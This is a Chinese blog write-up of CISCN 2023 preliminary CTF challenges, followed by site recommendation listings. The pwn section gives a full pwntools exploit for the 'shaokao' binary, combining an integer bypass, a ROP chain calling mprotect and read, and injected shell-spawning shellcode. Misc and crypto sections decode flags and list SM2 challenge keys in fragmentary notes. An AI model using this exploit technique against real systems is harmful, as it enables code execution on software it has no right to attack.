ciscn_pwn_shaokao

最新推荐文章于 2025-12-04 19:55:27 发布
原创 最新推荐文章于 2025-12-04 19:55:27 发布 · 335 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#经验分享 #系统安全 #网络安全 #密码学

ciscn初赛wp

pwn

shaokao

检查:

image-20230527170343950

发现是64位静态链接文件

ida查看:

main

image-20230527170503429

menu

image-20230527170530084

可以看到这里有一个if判断才可执行的“改名”

image-20230527170634568

很明显这里有一个栈溢出:

io.recvuntil("0. 离开".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("3. 勇闯天涯\n".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("来几瓶?\n".encode('utf-8'))
io.sendline(b'-99999')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'4')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'5')

拿到改名选项。

但是这题没有给我们system和binsh所以只能换种思路:因为是静态链接,所以一定有mprotect函数,可以直接更改段权限,这里我们可以直接更改bss段的权限,然后直接把shallcode写入bss段执行,又因为是64位,所以需要寄存器传参:

mprotect:

#include <sys/mman.h>
int mprotect(void *addr, size_t len, int prot);
addr:修改保护属性区域的起始地址,addr必须是一个内存页的起始地址,简而言之为页大小(一般是 4KB == 4096字节)整数倍。
len:被修改保护属性区域的长度,最好为页大小整数倍。修改区域范围[addr, addr+len-1]。
prot:可以取以下几个值,并可以用“|”将几个属性结合起来使用:
1)PROT_READ:内存段可读;
2)PROT_WRITE:内存段可写;
3)PROT_EXEC:内存段可执行;
4)PROT_NONE:内存段不可访问。
返回值:0;成功,-1;失败(并且errno被设置)
1)EACCES:无法设置内存段的保护属性。当通过 mmap(2) 映射一个文件为只读权限时,接着使用 mprotect() 标志为 PROT_WRITE这种情况就会发生。
2)EINVAL:addr不是有效指针,或者不是系统页大小的倍数。
3)ENOMEM:内核内部的结构体无法分配。
这里的参数prot:
r:4
w:2
x:1
prot为7(1+2+4)就是rwx可读可写可执行,与linux文件属性用法类似

参考:Linux中mprotect()函数详解__bob_h的博客-优快云博客

所以这里就可以更改权限:

payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+\ p64(0x100)+p64(pop_rdx)+p64(0x7)+p64(0x0)+p64(mp_addr)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(buf_addr)+p64(pop_rdx)+p64(0x100)+p64(0x0)+p64(read)+p64(buf_addr)#这里实际找到的pop_rdx只有两个

image-20230527172614882

所以还要多传一个参数

通过rdi,rsi,rdx三个寄存器给mprotect传参更改权限,然后ret到read函数的地址写入shellcode,再跳转到shellcode处执行

注:这里bss段的地址只能选用4kb整数倍的地址。

exp

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
context(terminal = ['tmux','split','-h'])
# io =remote('123.56.238.150',24460)
io = process('./shaokao')
mp_addr = 0x0458B00
pop_rdi = 0x040264f
pop_rsi = 0x040a67e
pop_rdx = 0x04a404b
read = 0x0457DD0
buf_addr = 0x4E9000
bss_addr = 0x4E9000

io.recvuntil("0. 离开".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("3. 勇闯天涯\n".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("来几瓶?\n".encode('utf-8'))
io.sendline(b'-99999')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'4')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'5')
# gdb.attach(io)
payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+\
    p64(0x100)+p64(pop_rdx)+p64(0x7)+p64(0x0)+p64(mp_addr)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(buf_addr)+p64(pop_rdx)+p64(0x100)+p64(0x0)+\
    p64(read)+p64(buf_addr)
io.recvuntil("请赐名:\n".encode('utf-8'))
shellcode = asm(shellcraft.sh())
io.sendline(payload)
io.sendline(shellcode)

io.interactive()

misc

使用wireshark打开:

直接追踪tcp流:

image-20230528174521395

中间红色部分拼接:

MMYWMX3GNEYWOXZRGAYDA===

直接base32解码:

flag:

c1f_fi1g_1000

Crypto

sign in passwd

用给的第二行数据进行base64换表,再解码:

from base64 import*
T1 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
T2 = 'GHI3KLMNJOPQRSTUb%3DcdefghijklmnopWXYZ%2F12%2B406789VaqrstuvwxyzABCDEF'
T2 = 'GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF'
enc = 'j2rXjx8yjd=YRZWyTIuwRdbyQdbqR3R9iZmsScutj2iqj3/tidj1jd=D'
str = ''
for i in range(len(enc)):
   str += T1[T2.index(enc[i])]
# str = base64.b64decode(str)
print(str)

得出:

ZmxhZ3s4ZTRiMjg4OC02MTQ4LTQwMDMtYjcyNS0zZmYwZDkzYTZlZTR9

解码:

flag{8e4b2888-6148-4003-b725-3ff0d93a6ee4}

国密sm2

做题时的记录:

"id": "45c620d1-0c23-4e75-aa49-484f769dc6e8"

A_prvite=2ABD46BACD79A7DE3E494056F80C3A802776CF454FB60EB4021D3162FA4BC3BC

A_public=E7EA0C52F83B28EC7449FDE2346650BA108BEF938E6622A279726B27FCB48D8650A324962C3B7E1857968FB2C734323FC65B675755BFC583EE343431D3E6B906

B_private=597a62be8f1f746b104b060351e7841e3a84d1a07b78f76908c420d8d467ce47

B_pub=0438e483c718bae10e03d4ed4476bd28131383860034b47364a48d27436e23acd2328de25edd07519be64874d88734f4cc2eb9fff2756065f5745f229d206cbdf3

random=9a770cae67c0277737b704dfcf02663dd278f8eb1fb46ddedbf1762ec0c75057a66614843af1624b68502c3487de72fb0fc661e1e713c333021afd36fe78d2d276fb8be13315b68870b9a825b86654e699cb2c92ee07d6f460e93e8dd6c75081009dbe7d1d1b2a9af28aae6fad3e6aa5

 "quantumString": "fd11b5ac03f85cd368d9234f847f2936a08ca3531468d4c67d3e3a002966725ccb0b793d12e4b0ad55689b72ac916998b4cba165c68ba09252b9f6724a28f7767921e9ddd63768530fd99e6738925cee8762d61ac2f9e29397dbbefd53110d26605bda47ab788e5548bc8ea3a77395fc"

随机数铭文:29 24 55 C9 3D 98 EA 1A 4B 25 8E A8 8D 97 77 30 

B_pri明文=


E8 B4 BA 6E F1 3A CE 6C  DC D2 79 FF DA D6 54 49
25 74 18 94 2B 0C EF 92  F1 9A 81 AF 02 66 62 6E

E34E5F83817D03A55E257D0214CD04E774E372FC451F1157773C2EA8012AFF1A1955E9BFC076D76F386526ED31CB411A0CFDE51D1F05CF7C07525D0CF69D67349F425C0AA71201E71C4DFA8A40B7A08191A5706B817563DB93CE

EC 5F 32 7D DB 33 CB 94 1D B3 C0 8B F8 E3 A7 BA

根据给的文件做就可以.

C2EA8012AFF1A1955E9BFC076D76F386526ED31CB411A0CFDE51D1F05CF7C07525D0CF69D67349F425C0AA71201E71C4DFA8A40B7A08191A5706B817563DB93CE

EC 5F 32 7D DB 33 CB 94 1D B3 C0 8B F8 E3 A7 BA


根据给的文件做就可以.
Hyrink
关注
ciscn2023_烧烤摊儿 wp(python3)
Kata_Jhin的博客
05-29 920
ciscn2023_烧烤摊儿(python3)wp
2023全国大学生信息安全竞赛(ciscn)初赛题解
热门推荐
返璞归真的博客
05-28 2万+
2023全国大学生信息安全竞赛(ciscn)部分题解
PWN-rop链技巧
CK_0ff的博客
05-27 1071
最近发现ROP链有时候非标准情况下也能构造成功,所以简要记录了下标准情况的rop和非标准的情况。
大话内存四区
weixin_46098612的博客
06-18 485
运行之前我们要想执行我们编写的c程序,那么第一步需要对这个程序进行编译。当我们编译完成生成可执行文件之后,我们通过在linux下size命令可以查看一个可执行二进制文件基本情况: 通过上图可以得知,在没有运行程序前,也就是说程序没有加载到内存前,可执行程序内部已经分好3段信息,分别为代码区(text)、数据区(data)和未初始化数据区(bss)3 个部分(有些人直接把data和bss合起来叫做静态区或全局区)。 1.代码区存放 CPU 执行的机器指令。通常代码区是可共享的(即另外的执行程序可
buuctf pwn(9~12)
cainiao78777的博客
12-22 347
14但是这样是打不通的两个payload我都调试了一下发现,这个数组的每一个下表对应的区域是一个地址,所以需要借助一下这个p32打包成32的这样发送出去。
CISCN2023初赛pwn
qq_51627915的博客
05-29 529
2023ciscn的初赛
ciscn2023初赛 writeup
S4n_v1的博客
05-28 4496
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
2023CISCN部分wp
qq_51862722的博客
05-29 1012
2023ciscn部分wp
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUU刷题-Pwn-ciscn_2019_en_2(和BUU刷题ciscn_2019_c_1为同一题)
一个啥也不会的小菜鸡!
06-21 270
是一个菜单题,有一个栈溢出漏洞,但里面有字符串加密逻辑,绕过后才可以使用栈溢出。而且本题中没有后门函数等,所以需要自己去寻找,首先泄露除一个函数地址,进而计算出system和“/bin/sh”的置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离:0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]
BUUCTF Pwn ciscn_2019_c_1 题解
qq_33348179的博客
12-01 484
2.接下来找libc的版本 利用 libc地址 = 真实地址 - 偏移地址 得到system和binsh的地址。其中,用两次recvline()的原因是隔离掉 \n 和 ciphertext。puts_address的那一大串是用于接收地址 去掉结尾的\0 并且将长度补到。SHIFT+F12查看字符串 可以看到没有后门函数 这是一道ret2libc题。同时因为这是64程序,函数参数用寄存器存储且第一个是 RDI寄存器。1.首先,构造payload1,得到puts的真实地址。ret用于64栈平衡。
【BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 702
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF PWN wp--ciscn_2019_n_1
2302_81740139的博客
08-25 484
得到gets缓冲区的范围大小。用垃圾数据填充v1(如上图箭头为0x30+0x8),溢出v2,覆盖到下方的system函数,转换到cat/flag的地址0x4006BE。第二步 进入主函数,发现func,main函数调用了func,func中存在经典gets()漏洞,我们看到本题是v2数组在做比较。第一步 checksec,并检查该题的保护机制。第三步 编写脚本。
中南大学经验分享
xiaomage_mengma的博客
12-04 707
本人信号140分,属于不差的水平,对于大多数院校而言,信号的出题都不会很难(南京大学,海南大学除外),中南的信号难度在985里算是比较简单的了,卷子只有8道大题,比较考验基本功的掌握,中南的卷子我从2004年开始都写过,以往的考察比较套路也比较容易,8道题只会有一道有难度,而且以前的参考书是吴大正,很多真题都是摘取书上的习题,一个字都没改,现在换了更难的奥本海默,所以对于知识的考查的难度这两年都有在上升。我们一定要保持自信,对自己的实力有比较清楚的认知,一定要不断的问自己真的搞懂了吗,最终一定会有所收获。
《QGIS快速入门与应用基础》016:系统安全设置与未知来源授权
LuckyHanMo的博客
12-04 103
针对macOS系统安装QGIS时遇到的GateKeeper安全拦截问题,详细介绍了三种解决方案:1)通过系统设置的"隐私与安全性"进行单应用授权(推荐);2)使用终端命令临时开启"任何来源"选项;3)通过右键菜单绕过单次拦截。文章还提供了授权后仍无法启动的排查方法,包括移除隔离属性命令,并给出安全操作建议,强调优先使用单应用授权以保障系统安全。最后指出安装完成后首次启动加载时间较长属正常现象,界面语言设置可参考后续章节调整。
车辆TBOX科普 第54次 物联网车辆监控系统安全三支柱:通信加密、证书管理与数据存储实战
IT深耕十余载,大道之简
12-04 630
智能网联汽车安全架构核心技术解析 随着全球网联汽车保有量突破2.5亿辆,安全已成为智能汽车发展的基石。本文从三大核心技术维度探讨物联网车辆监控系统的安全架构: 安全通信机制:采用TLS 1.3协议实现50%以上的连接速度提升,强制ECDHE密钥交换确保前向安全;针对不稳定网络环境引入DTLS协议,通过序列号检测重放攻击;应用QUIC协议减少30%视频卡顿,支持零-RTT快速重连。 数字证书管理:构建分层PKI体系(根CA→注册CA→车辆证书),证书包含车辆VIN码、硬件标识等扩展字段;实现自动化证书生命周期
智能配电嵌入式系统安全编码规范Checklist与实施指南
最新发布
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
12-04 592
本文提出智能配电系统的安全编码规范,强调安全内建(Built-in)理念,将安全融入开发全流程。规范基于三大原则:默认为安全、完整的中介和最小权限。主要内容包括:1)输入验证与数据安全,要求严格验证外部输入、使用白名单和缓冲区安全操作;2)内存安全管理,规范动态内存分配、释放和栈保护;3)密码学与密钥管理,规定必须使用国密算法、禁止硬编码密钥。针对配电系统特点,提供了协议数据包验证、内存池管理和分层密钥管理等具体实现方案,确保系统安全性从代码层面得到保障。
嵌入式系统安全引导(Secure Boot)详细设计指南
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
12-04 604
嵌入式系统安全引导设计摘要: 本文详细阐述了关键基础设施中嵌入式系统的安全引导架构设计。系统采用分层验证机制,从硬件信任根(ROM代码)开始,逐级验证引导程序、操作系统和应用组件。设计重点包括:1)硬件安全基础层配置(HSM/OTP/MPU);2)多阶段引导验证流程;3)国密算法密码学方案(SM2/SM3/SM4);4)防回滚与安全更新机制。通过分块验证、版本控制和双分区更新等优化策略,在资源受限环境下实现安全与性能的平衡。方案特别强调供应链安全,采用分阶段签名和多方授权机制,适用于能源管理、工业控制等高安
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8834
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值